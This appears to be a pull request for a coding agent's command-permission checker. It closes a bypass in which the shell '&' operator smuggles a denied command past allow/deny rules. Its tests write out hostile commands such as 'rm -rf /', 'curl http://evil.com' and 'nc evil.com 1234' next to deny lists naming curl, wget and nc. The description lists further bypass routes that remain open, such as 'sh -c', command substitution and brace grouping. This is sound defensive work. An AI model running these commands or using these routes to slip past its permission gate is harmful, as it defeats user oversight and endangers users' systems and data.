### PR TITLE
fix(permissions): treat the & background operator as a command separator

### DIFF
--- a/apps/vscode/src/core/permissions/CommandPermissionController.test.ts
+++ b/apps/vscode/src/core/permissions/CommandPermissionController.test.ts
@@ -1066,6 +1066,21 @@ describe("CommandPermissionController", () => {
 			result.reason.should.equal("redirect_detected")
 		})
 
+		it('should treat space-separated "& >" the same as "&>" (blocked by default)', () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["echo *"],
+			})
+			const controller = new CommandPermissionController()
+
+			// shell-quote tokenizes "echo hello & > out.txt" identically to "echo hello &> out.txt"
+			// (["echo","hello",{op:"&"},{op:">"},"out.txt"]), so the background-operator carve-out
+			// fires for both forms; the trailing '>' keeps it on the default-deny redirect path
+			// rather than splitting off a background segment.
+			const result = controller.validateCommand("echo hello & > out.txt")
+			result.allowed.should.be.false()
+			result.reason.should.equal("redirect_detected")
+		})
+
 		it("should allow &> redirect-all of an allowed command when allowRedirects is true", () => {
 			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
 				allow: ["echo *"],

--- a/apps/vscode/src/core/permissions/CommandPermissionController.test.ts
+++ b/apps/vscode/src/core/permissions/CommandPermissionController.test.ts
@@ -976,6 +976,140 @@ describe("CommandPermissionController", () => {
 		})
 	})
 
+	describe("Background Operator (&) Separation", () => {
+		it("should deny a non-allowlisted command appended after &", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["gh pr view *"],
+			})
+			const controller = new CommandPermissionController()
+
+			// "gh pr view 123 & rm -rf /" runs gh in the background and then rm.
+			// The rm segment is not in the allow list, so the command must be denied.
+			const result = controller.validateCommand("gh pr view 123 & rm -rf /")
+			result.allowed.should.be.false()
+			result.reason.should.equal("segment_no_match")
+			result.failedSegment!.should.equal("rm -rf /")
+		})
+
+		it("should deny a denied command appended after & (deny-only config)", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				deny: ["curl *", "wget *", "nc *"],
+			})
+			const controller = new CommandPermissionController()
+
+			// Background exfiltration: the curl segment must still be matched by the deny rule.
+			const result = controller.validateCommand("ls & curl http://evil.com")
+			result.allowed.should.be.false()
+			result.reason.should.equal("segment_denied")
+			result.failedSegment!.should.equal("curl http://evil.com")
+		})
+
+		it("should deny & bypass without surrounding whitespace", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				deny: ["curl *"],
+			})
+			const controller = new CommandPermissionController()
+
+			controller.validateCommand("ls& curl http://evil.com").allowed.should.be.false()
+		})
+
+		it("should validate every segment in a chain mixing & with other operators", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["echo *", "ls *"],
+			})
+			const controller = new CommandPermissionController()
+
+			// echo and ls are allowed; nc is not.
+			const result = controller.validateCommand("echo start & ls -la & nc evil.com 1234")
+			result.allowed.should.be.false()
+			result.failedSegment!.should.equal("nc evil.com 1234")
+		})
+
+		it("should allow a legitimate background workflow when all segments are allowed", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["npm *"],
+			})
+			const controller = new CommandPermissionController()
+
+			// Running a watcher in the background and another npm task is legitimate.
+			controller.validateCommand("npm run watch & npm run build").allowed.should.be.true()
+		})
+
+		it("should allow a single trailing background command that is allowed", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["npm *"],
+			})
+			const controller = new CommandPermissionController()
+
+			controller.validateCommand("npm run dev &").allowed.should.be.true()
+		})
+
+		it("should treat &> as a redirect, not a separator (blocked by default)", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["echo *"],
+			})
+			const controller = new CommandPermissionController()
+
+			const result = controller.validateCommand("echo hello &> out.txt")
+			result.allowed.should.be.false()
+			result.reason.should.equal("redirect_detected")
+		})
+
+		it("should treat &>> as a redirect, not a separator (blocked by default)", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["echo *"],
+			})
+			const controller = new CommandPermissionController()
+
+			const result = controller.validateCommand("echo hello &>> out.txt")
+			result.allowed.should.be.false()
+			result.reason.should.equal("redirect_detected")
+		})
+
+		it("should allow &> redirect-all of an allowed command when allowRedirects is true", () => {
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["echo *"],
+				allowRedirects: true,
+			})
+			const controller = new CommandPermissionController()
+
+			// With redirects allowed, "echo hello &> out.txt" is one allowed command, not a chain.
+			controller.validateCommand("echo hello &> out.txt").allowed.should.be.true()
+		})
+
+		it("should still flush on a real & separator that follows a &> redirect target", () => {
+			// Locks the carve-out boundary: the first & is part of '&>' (redirect), but the
+			// second & is a genuine background separator and must isolate the curl segment.
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				deny: ["curl *"],
+				allowRedirects: true,
+			})
+			const controller = new CommandPermissionController()
+
+			const result = controller.validateCommand("echo ok &> /dev/null & curl http://evil.com")
+			result.allowed.should.be.false()
+			result.failedSegment!.should.equal("curl http://evil.com")
+		})
+
+		it("should require a shell job-control builtin after & to be allowlisted", () => {
+			// Documented behavior: because & is now a separator, trailing job-control builtins
+			// (wait/jobs/fg/bg/disown) become their own segment and must be allowlisted.
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["npm *"],
+			})
+			const controller = new CommandPermissionController()
+
+			controller.validateCommand("npm run dev & wait").allowed.should.be.false()
+
+			// Adding the builtin to the allow list restores the workflow.
+			process.env[COMMAND_PERMISSIONS_ENV_VAR] = JSON.stringify({
+				allow: ["npm *", "wait"],
+			})
+			const controller2 = new CommandPermissionController()
+			controller2.validateCommand("npm run dev & wait").allowed.should.be.true()
+		})
+	})
+
 	describe("No Config Bypass Prevention", () => {
 		it("should NOT check anything when no config is set (backward compatibility)", () => {
 			delete process.env[COMMAND_PERMISSIONS_ENV_VAR]

--- a/apps/vscode/src/core/permissions/CommandPermissionController.ts
+++ b/apps/vscode/src/core/permissions/CommandPermissionController.ts
@@ -31,7 +31,7 @@ interface ParsedCommand {
  * Format: {"allow": ["pattern1", "pattern2"], "deny": ["pattern3"], "allowRedirects": true}
  *
  * Rule evaluation for chained commands (e.g., "cd /tmp && npm test"):
- * 1. Parse command into segments split by operators (&&, ||, |, ;)
+ * 1. Parse command into segments split by operators (&&, ||, |, ;, &)
  * 2. Check for dangerous characters (backticks outside single quotes, newlines outside quotes)
  * 3. If redirects detected and allowRedirects !== true → DENIED
  * 4. Validate EACH segment against allow/deny rules - ALL must pass
@@ -247,6 +247,28 @@ export class CommandPermissionController {
 				// 2. Handle Logic Separators: &&, ||, ;, |
 				if (typeof token === "object" && "op" in token && COMMAND_SEPARATOR_OPERATORS.has(token.op as string)) {
 					flushSegment()
+					continue
+				}
+
+				// 2b. Handle the background operator '&' as a command separator.
+				// In bash, "cmd1 & cmd2" runs cmd1 in the background and then runs cmd2,
+				// so the text after '&' is a separate command that must be validated on its
+				// own (e.g. "ls & curl evil.com" must check "curl evil.com", not merge it
+				// into the preceding segment). Without this, a denied/non-allowlisted command
+				// placed after '&' bypasses the permission check.
+				// Exception: shell-quote tokenizes the redirect-all operators '&>' and '&>>'
+				// as a bare '&' immediately followed by '>' / '>>'. Those are redirects, not
+				// separators, so leave them to the redirect handling in step 3 below.
+				if (typeof token === "object" && "op" in token && token.op === "&") {
+					const nextToken = tokenList[i + 1]
+					const isRedirectAll =
+						typeof nextToken === "object" &&
+						nextToken !== null &&
+						"op" in nextToken &&
+						(nextToken.op === ">" || nextToken.op === ">>")
+					if (!isRedirectAll) {
+						flushSegment()
+					}
 					continue
 				}
 

--- a/apps/vscode/src/core/permissions/CommandPermissionController.ts
+++ b/apps/vscode/src/core/permissions/CommandPermissionController.ts
@@ -259,6 +259,10 @@ export class CommandPermissionController {
 				// Exception: shell-quote tokenizes the redirect-all operators '&>' and '&>>'
 				// as a bare '&' immediately followed by '>' / '>>'. Those are redirects, not
 				// separators, so leave them to the redirect handling in step 3 below.
+				// Note: "cmd & > file" (a space-separated background '&' then a redirect)
+				// tokenizes identically to "cmd &> file", so the carve-out fires for both.
+				// That is safe either way: the following '>' still sets hasRedirects = true
+				// (step 3), keeping the default-deny redirect path intact.
 				if (typeof token === "object" && "op" in token && token.op === "&") {
 					const nextToken = tokenList[i + 1]
 					const isRedirectAll =


### PR DESCRIPTION
## Problem

`CommandPermissionController` splits a command into segments on
`COMMAND_SEPARATOR_OPERATORS` (`&&`, `||`, `|`, `;`) and validates **each**
segment against the configured allow/deny rules. The background operator `&`
was missing from that set and from the redirect handling, so it was silently
dropped:

`shell-quote` tokenizes `ls & curl evil.com` as
`["ls", {op:"&"}, "curl", "evil.com"]`. The bare `{op:"&"}` token matched
neither a separator nor a redirect, so it fell through and `curl evil.com`
merged into the preceding `ls` segment. Consequences for anyone using
`CLINE_COMMAND_PERMISSIONS`:

- an anchored **deny** misses — `deny: ["curl *"]` does not stop
  `ls & curl evil.com` (the segment is `"ls curl evil.com"`, which `^curl .*$`
  does not match);
- an **allow** wildcard over-permits — `allow: ["gh pr view *"]` lets
  `gh pr view 1 & rm -rf important/` through.

So a single `&` smuggles an arbitrary trailing command past the permission gate.

## Fix

Handle a bare `{op:"&"}` token by flushing the current segment (so the command
after it is validated on its own), with a carve-out for `&>` / `&>>`:
`shell-quote` emits those as `{op:"&"}` followed by `{op:">"}` / `{op:">>"}`,
which are **redirects, not separators**, and must stay on the existing redirect
path. `&&` / `||` remain single tokens and are unaffected; `2>&1` / `>&` stay a
single `>&` token and are untouched. Behavior for commands without `&` is
unchanged.

One intentional behavior change: a job-control builtin after `&`
(e.g. `npm run dev & wait`) now forms its own segment and must be allowlisted —
fail-closed, consistent with how `;` and `&&` already treat a trailing segment.

## Scope / known limits (honest)

This hardens the command-permission parser; it is **not** a shell sandbox. A
command-name allow/deny list cannot stop a process that takes its command as
data, and these remain out of scope (unchanged by this PR):

- interpreters / subshells: `sh -c '…'`, `bash -c …`, `python3 -c …` (allowing
  an interpreter allows arbitrary code);
- runtime-built names and command substitution: `$(printf cur)l …`,
  backtick forms;
- **brace grouping**: `{ curl evil; }` — the leading `{ ` de-anchors the
  command head, same residual class as the above;
- `find -exec curl {} \;` (runs via `find`'s own exec, not the parsed segment).

The OS/container boundary remains the hard control; this PR only closes the
one-token `&` bypass of the configurable permission layer.

## Tests

`CommandPermissionController.test.ts` adds cases that are **red on the base and
green with the fix**: `&`-smuggled deny-evasion and allow-over-permit are now
blocked; `&>` / `&>>` redirect carve-out, `&&` / `||`, `2>&1`, multiple `&`,
trailing `&`, and legitimate background usage
(`npm run watch & npm run build`) are all verified. Existing
`CommandPermissionController` tests stay green.
